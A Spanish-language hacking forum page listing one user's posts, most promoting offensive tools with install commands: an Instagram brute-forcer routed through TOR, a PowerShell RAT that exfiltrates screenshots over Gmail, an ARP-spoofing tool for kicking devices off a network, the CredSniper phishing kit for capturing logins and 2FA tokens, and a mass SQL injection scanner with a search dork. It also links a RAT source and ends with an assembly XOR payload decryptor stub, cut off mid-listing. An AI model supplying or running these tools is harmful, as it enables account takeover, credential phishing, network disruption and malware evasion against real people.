Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - ZanGetsu

#1
Hacking Tools / Instashell
Marzo 06, 2020, 04:18:45 PM

Instashell es un script de Shell para realizar ataques de fuerza bruta de subprocesos múltiples contra Instagram, este script puede omitir la limitación de inicio de sesión y puede probar un número infinito de contraseñas con una velocidad de +400 contraseñas / min usando 20 hilos.

Caracteristicas:


  • Multi-thread (400 pass/min, 20 threads)
  • Save/Resume sessions
  • Anonymous attack through TOR
  • Check valid usernames
  • Default password list (best +39k 8 letters)
  • Check and Install all dependencies

Instalación:
Código: text

git clone https://github.com/thelinuxchoice/instashell
cd instashell
chmod +x instashell.sh
service tor start
sudo ./instashell.sh
#2
Hacking Tools / BruteSploit
Marzo 06, 2020, 04:13:45 PM
BruteSploit es una colección de métodos para Bruteforce y Wordlists. Eso se puede usar durante pruebas de pentest.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#3
Hacking Tools / Powershell-RAT
Marzo 06, 2020, 04:07:27 PM
Basada en Python usa Gmail para filtrar datos a través de archivos adjuntos, Realiza un seguimiento de la actividad del usuario mediante la captura de pantalla y la envía a un atacante como un archivo adjunto de correo electrónico.

RAT Architecture Diagram



On the first run of the Powershell-RAT user will get options as below:



Using Hail Mary option to backdoor a Windows machine:





Data exfiltrated as an email attachment using Gmail:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#4
Hacking / DumpsterFire Toolset
Diciembre 18, 2017, 05:16:03 PM
DumpsterFire Toolset - "Security Incidents In A Box!"

El juego de herramientas DumpsterFire es una herramienta modular, impulsada por menú y multiplataforma para crear eventos de seguridad distribuidos, temporizados y distribuidos. Cree fácilmente cadenas de eventos personalizadas para simulacros de Blue Team y mapeo de sensores / alertas. Los Equipos Rojos pueden crear incidentes señuelos, distracciones y señuelos para apoyar y escalar sus operaciones. Convierta los ejercicios de mesa de papel en eventos controlados de "fuego real". Genere secuencias de eventos ("narrativas") para simular escenarios realistas y generar los artefactos de red y sistema de archivos correspondientes.

El conjunto de herramientas está diseñado para ser dinámicamente extensible, lo que le permite crear sus propios Incendios (módulos de eventos) para agregar a la colección incluida de Incendios del conjunto de herramientas. Simplemente escriba su propio módulo de Fire y colóquelo en el directorio de FireModules. El conjunto de herramientas de DumpsterFire detectará automáticamente sus Incendios personalizados al inicio y los pondrá a disposición para su uso.




Descarga y mas Info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#5

Una herramienta para expulsar dispositivos de tu red y disfrutar todo el ancho de banda por ti mismo. Le permite seleccionar dispositivos específicos o todos y ARP los expulsa fuera de su red de área local.

Compatible con Python:


  • 2.6
  • 2.7

Instalacion en Debian:

Código: text
$ sudo apt-get update && sudo apt-get install nmap

$ git clone https://github.com/k4m4/kickthemout.git

$ cd kickthemout/

$ sudo -H pip install --upgrade pip

$ sudo -H python -m pip install -r requirements.txt

$ sudo python kickthemout.py


Instalacion MacOS:

Código: text
$ sudo -H pip install --upgrade pip

$ sudo -H pip install pcapy

$ brew update

$ brew install --with-python libdnet nmap


Video: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Developers:

Nikolaos Kamarinakis - @nikolaskama
David Schütz - @xdavidhu

Mas Informacion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos !
#6
Presentaciones y cumpleaños / Volviendo ..
Diciembre 07, 2017, 10:29:31 AM
Buenas chicos, paso a saludarlos despues de un buen tiempo offline, ya me encuentro un poco mas activo y con mas tiempo
para aportar cosillas :D

Saludos gente !!
#7
Hacking / CredSniper - phishing framework
Diciembre 01, 2017, 09:05:53 AM

Inicie fácilmente un nuevo sitio de phishing presentado completamente con SSL y credenciales de captura junto con tokens 2FA usando CredSniper. La API proporciona acceso seguro a las credenciales capturadas actualmente que pueden ser consumidas por otras aplicaciones utilizando un token API generado aleatoriamente.





  • SSL totalmente compatible a través de Let's Encrypt
  • Clones de formulario de inicio de sesión exactos para phishing realista
  • Cualquier número de páginas intermedias

    • (es decir, inicio de sesión de Gmail, contraseña y páginas de dos factores, luego una redirección)
  • Admite tokens de phishing 2FA
  • API para integrar credenciales en otras aplicaciones
  • Fácil de personalizar usando un marco de plantillas
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga y instalacion

git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
cd CredSniper
./install.sh
#8
Hacking / Spaghetti - Web Application Security Scanner
Septiembre 18, 2017, 06:41:17 PM
Spaghetti es una herramienta de escaneo de seguridad de aplicaciones web. Está diseñado para encontrar varios archivos predeterminados e inseguros, configuraciones y configuraciones erróneas. Spaghetti se basa en python2.7 y puede ejecutarse en cualquier plataforma que tenga un entorno Python.




Caracteristicas:

Fingerprints

  • Server
  • Web Frameworks (CakePHP,CherryPy,Django,...)
  • Web Application Firewall (Waf) (Cloudflare,AWS,Barracuda,...)
  • Content Management System (CMS) (Drupal,Joomla,Wordpress,Magento)
  • Operating System (Linux,Unix,Windows,...)
  • Language (PHP,Ruby,Python,ASP,...)


  • Discovery:

    • Apache

      • Apache (mod_userdir)
      • Apache (mod_status)
      • Apache multiviews
      • Apache xss
    • Broken Auth./Session Management

      • Admin Panel
      • Backdoors
      • Backup Directory
      • Backup File
      • Common Directory
      • Common File
      • Log File
    • Disclosure

      • Emails
      • IP
    • Injection

      • HTML
      • SQL
      • LDAP
      • XPath
      • XSS
      • RFI
      • PHP Code
    • Other

      • Allow Methods
      • HTML Object
      • Multiple Index
      • Robots Paths
      • Cookie Security
    • Vulns

      • ShellShock
      • Struts-Shock
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#9
Hacking / WSSAT - Web Service Security Assessment Too
Septiembre 04, 2017, 03:45:27 PM
WSSAT es una herramienta de exploración de seguridad de servicios web de código abierto que proporciona un entorno dinámico para agregar, actualizar o eliminar vulnerabilidades simplemente editando sus archivos de configuración. Esta herramienta acepta la lista de direcciones WSDL como archivo de entrada y para cada servicio, realiza pruebas estáticas y dinámicas contra las vulnerabilidades de seguridad. También hace controles de divulgación de información. Con esta herramienta, todos los servicios web podrían ser analizados de una vez y la evaluación general de seguridad podría ser vista por la organización.


  • Insecure Communication - SSL Not Used
  • Unauthenticated Service Method
  • Error Based SQL Injection
  • Cross Site Scripting
  • XML Bomb
  • External Entity Attack - XXE
  • XPATH Injection
  • Verbose SOAP Fault Message
Static Analysis:


  • Weak XML Schema: Unbounded Occurrences
  • Weak XML Schema: Undefined Namespace
  • Weak WS-SecurityPolicy: Insecure Transport
  • Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
  • Weak WS-SecurityPolicy: Tokens Not Protected


    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Hacking / Raven - Linkedin information gathering tool
Agosto 30, 2017, 09:16:46 PM
FUENTE:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

raven is a Linkedin information gathering tool that can be used by pentesters to gather information about an organization employees using Linkedin.

Installation

  • Run No tienes permitido ver los links. Registrarse o Entrar a mi cuenta as root
  • Adjust Linkedin credentials in No tienes permitido ver los links. Registrarse o Entrar a mi cuenta or pass them as parameters.
  • If you are running in Kali Linux , to avoid problems with selenium update firefox to the latest version.

Código: text
usage: raven.py [-h] -c COMPANY -s STATE -d DOMAIN [-p PAGES] [-lu LUSERNAME] [-lp LPASSWORD]

Raven - LinkedIn Information Gathering Tool

-c COMPANY, --company COMPANY       Input the Company name. Ex: Pizzahut
                   
-s STATE, --state STATE             Input the State initials. Ex: uk , al , etc...
                   
-d DOMAIN, --domain DOMAIN          Input the domain name. Ex: gmail.com
                   
-p PAGES, --pages PAGES             Number of google pages to navigate. Ex: 3







No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
Hacking / Sqliv - Massive Sql Scan
Agosto 29, 2017, 12:46:04 AM
FUENTE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

SQLiv – Massive SQL injection scanner.
Features
+ multiple domain scanning with SQL injection dork
+ targetted scanning by providing specific domain (with crawling).
+ reverse domain scanning


Instalacion:

Código: text
git clone https://github.com/Hadesy2k/sqliv && cd sqliv
pip install -r requirements.txt
sudo python setup.py -i

sqliv -d "inurl:index.php?id=" -e google
#12
Bluto es una Herramienta basada en Python, para Realizar Enumeración de DNS, bruteforce en subdominios entre otros, las características completa son:


DNS Recon
Brute Forcer
DNS Zone Transfer
DNS Wild Card Checks
DNS Wild Card Brute Forcer
Email Enumeration
Staff Enumeration
Compromised Account Enumeration
MetaData Harvesting

Pasemos a la instalacion:

Código: text
sudo pip install git+git://github.com/darryllane/Bluto




Al iniciar me dio el siguiente error:
ImportError: No module named docopt

Lo cual lo solucionaremos instalando docopt

Código: text
sudo apt-get install python-docopt


Ahora si podemos iniciarlo:





Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13

Código: text
▼ 1 Introduction to 802.11 Hacking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7
802.11 in a Nutshell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
The Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8
Addressing in 802.11 Packets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
802.11 Security Primer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Discovery Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Hardware and Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
A Note on the Linux Kernel . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Chipsets and Linux Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22
Modern Chipsets and Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
Cards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
Antennas . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
Cellular Data Cards . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37
GPS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40
▼ 2 Scanning and Enumerating 802.11 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
Choosing an Operating System . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

xii Hacking Exposed Wireless: Wireless Security Secrets & Solutions
OS X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42
Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Windows Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Vistumbler . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44
inSSIDer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48
Windows Sniffi ng/Injection Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 50
NDIS 6.0 Monitor Mode Support (NetMon) . . . . . . . . . . . . . . . . . . . . 50
AirPcap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
CommView for WiFi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 56
OS X Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
KisMAC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61
Kismet on OS X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Linux Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Kismet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 67
Mobile Discovery Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 73
Online Mapping Services (WIGLE and Skyhook) . . . . . . . . . . . . . . . . . . . . . . 75
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77
▼ 3 Attacking 802.11 Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 79
Basic Types of Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Security Through Obscurity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 80
Defeating WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
WEP Key Recovery Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Bringing It All Together: Cracking a Hidden Mac-Filtering,
WEP-Encrypted Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Keystream Recovery Attacks Against WEP . . . . . . . . . . . . . . . . . . . . . . . . . . . 107
Attacking the Availability of Wireless Networks . . . . . . . . . . . . . . . . . . . . . . . 111
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113
▼ 4 Attacking WPA-Protected 802.11 Networks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Breaking Authentication: WPA-PSK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Breaking Authentication: WPA Enterprise . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
Obtaining the EAP Handshake . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 129
LEAP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 131
PEAP and EAP-TTLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133
EAP-TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 136
EAP-FAST . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 137
EAP-MD5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 139
Breaking Encryption: TKIP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 141
Attacking Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 151

Part II Hacking 802.11 Clients
Case Study: Riding the Insecure Airwaves . . . . . . . . . . . . . . . . . . . . . . . . . . . . 154
▼ 5 Attack 802.11 Wireless Clients . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 155
Attacking the Application Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 157
Attacking Clients Using an Evil DNS Server . . . . . . . . . . . . . . . . . . . . . . . . . . 161
Ettercap Support for Content Modification . . . . . . . . . . . . . . . . . . . . . . . . . . . 165
Dynamically Generating Rogue APs and Evil Servers with Karmetasploit 167
Direct Client Injection Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Injecting Data Packets with AirPWN . . . . . . . . . . . . . . . . . . . . . . . . . . 172
Generic Client-side Injection with airtun-ng . . . . . . . . . . . . . . . . . . . . 175
Munging Software Updates with IPPON . . . . . . . . . . . . . . . . . . . . . . . 177
Device Driver Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 182
Fingerprinting Device Drivers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 186
Web Hacking and Wi-Fi . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 187
Hacking DNS via XSRF Attacks Against Routers . . . . . . . . . . . . . . . . 197
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 201
▼ 6 Taking It All The Way: Bridging the Airgap from OS X . . . . . . . . . . . . . . . . . . . . . . . . . 203
The Game Plan . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
Preparing the Exploit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 204
Prepping the Callback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Performing Initial Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . 210
Preparing Kismet, Aircrack-ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Prepping the Package . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Exploiting WordPress to Deliver the Java Exploit . . . . . . . . . . . . . . . . 214
Making the Most of User-level Code Execution . . . . . . . . . . . . . . . . . . . . . . . 217
Gathering 802.11 Intel (User-level Access) . . . . . . . . . . . . . . . . . . . . . . 219
Popping Root by Brute-forcing the Keychain . . . . . . . . . . . . . . . . . . . 220
Returning Victorious to the Machine . . . . . . . . . . . . . . . . . . . . . . . . . . . 226
Managing OS X's Firewall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
▼ 7 Taking It All the Way: Bridging the Airgap from Windows . . . . . . . . . . . . . . . . . . . . . . . 239
The Attack Scenario . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 240
Preparing for the Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 241
Exploiting Hotspot Environments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Controlling the Client . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 247
Local Wireless Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 248
Remote Wireless Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
Windows Monitor Mode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 256
Microsoft NetMon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Target Wireless Network Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 267
Contents xiii

xiv Hacking Exposed Wireless: Wireless Security Secrets & Solutions
Part III Hacking Additional Wireless Technologies
Case Study: Snow Day . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 270
▼ 8 Bluetooth Scanning and Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 273
Bluetooth Technical Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 274
Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Protocol Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275
Bluetooth Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Encryption and Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 278
Preparing for an Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Selecting a Bluetooth Attack Device . . . . . . . . . . . . . . . . . . . . . . . . . . . 279
Reconnaissance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Active Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 282
Passive Device Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 290
Hybrid Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 293
Passive Traffi c Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 296
Service Enumeration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 309
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 313
▼ 9 Bluetooth Eavesdropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315
Commercial Bluetooth Sniffi ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 316
Open-Source Bluetooth Sniffi ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 326
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343
▼ 10 Attacking and Exploiting Bluetooth . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 345
PIN Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346
Practical PIN Cracking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 352
Identity Manipulation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Bluetooth Service and Device Class . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
Bluetooth Device Name . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
Abusing Bluetooth Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374
Testing Connection Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
Unauthorized AT Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 377
Unauthorized PAN Access . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
Headset Profi le Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
File Transfer Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
Future Outlook . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 396
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
▼ 11 Hack ZigBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
ZigBee Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 400
ZigBee's Place as a Wireless Standard . . . . . . . . . . . . . . . . . . . . . . . . . . 400
ZigBee Deployments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 401
ZigBee History and Evolution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402

Contents xv
ZigBee Layers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
ZigBee Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 406
ZigBee Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Rules in the Design of ZigBee Security . . . . . . . . . . . . . . . . . . . . . . . . . 407
ZigBee Encryption . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
ZigBee Authenticity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
ZigBee Authentication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
ZigBee Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Introduction to KillerBee . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 411
Network Discovery . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
Eavesdropping Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 418
Replay Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 424
Encryption Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
Attack Walkthrough . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Network Discovery and Location . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 430
Analyzing the ZigBee Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
RAM Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 436
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 438
▼ 12 Hack DECT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 439
DECT Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
DECT Profi les . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
DECT PHY Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
DECT MAC Layer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
Base Station Selection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
DECT Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 444
Authentication and Pairing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 445
Encryption Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
DECT Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
DECT Hardware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 448
DECT Eavesdropping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 449
DECT Audio Recording . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 455
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 458
▼ A Scoping and Information Gathering . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
Pre-assessment . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Scoping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 460
Things to Bring to a Wireless Assessment . . . . . . . . . . . . . . . . . . . . . . 462
Conducting Scoping Interviews . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 464
Gathering Information via Satellite Imagery . . . . . . . . . . . . . . . . . . . . 465
Putting It All Together . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469


Enlace de descarga:
Código: text
https://jumpshare.com/v/d9r6fFgGe7mOfyx7wI3i
#14
C# - VB.NET / FkN RAT SRC
Julio 27, 2017, 09:48:24 AM


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#15
ASM / X0R encryption
Julio 27, 2017, 09:41:58 AM
Código: asm
.386
.model flat, stdcall
option casemap:none


include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib


.data
Key db "uidoisbossuidoisboss"   ;key for decrypting
KeyLength equ $- offset Key
.data?
Buffer db ?
.code
start:
jmp Go
Payload:
db 00bh, 064h, 08dh, 07fh, 032h, 0d2h, 015h,\ ;
   069h, 022h, 039h, 00fh, 064h, 0d8h, 055h,\ ;
   038h, 06ah, 032h, 059h, 030h, 08eh, 04ch,\ ;
   065h, 077h, 061h, 08ch, 081h, 094h, 095h,\ ;
   0c6h, 063h, 053h, 01fh, 01ah, 009h, 001h,\ ;
   010h, 025h, 059h, 01ah, 046h, 05ah, 05fh,\ ;
   008h, 06ah, 08dh, 0a1h, 09eh, 09bh, 099h   ;
db 038h, 00bh, 054h, 040h, 05eh, 017h, 06ah,\ ;
   090h,   ;



Go:
mov ebx, KeyLength ;setting the Keylength
mov ecx, 0 ;zeroing the main iterator
mov edx, 0 ;zeroing the key iterator
lea eax, Key
Cipher:
cmp byte Payload[ecx], 090h    ;checking if the byte isn't the NOP
je Payload ;if so jump to Payload
cmp ebx, edx ;checking if the key iterator didn't reach the length limit
jg Skip ;if not the skip zeroing the next instruction
lea eax, Key ;zero-ing the key iterator
Skip:
mov DL, [eax]
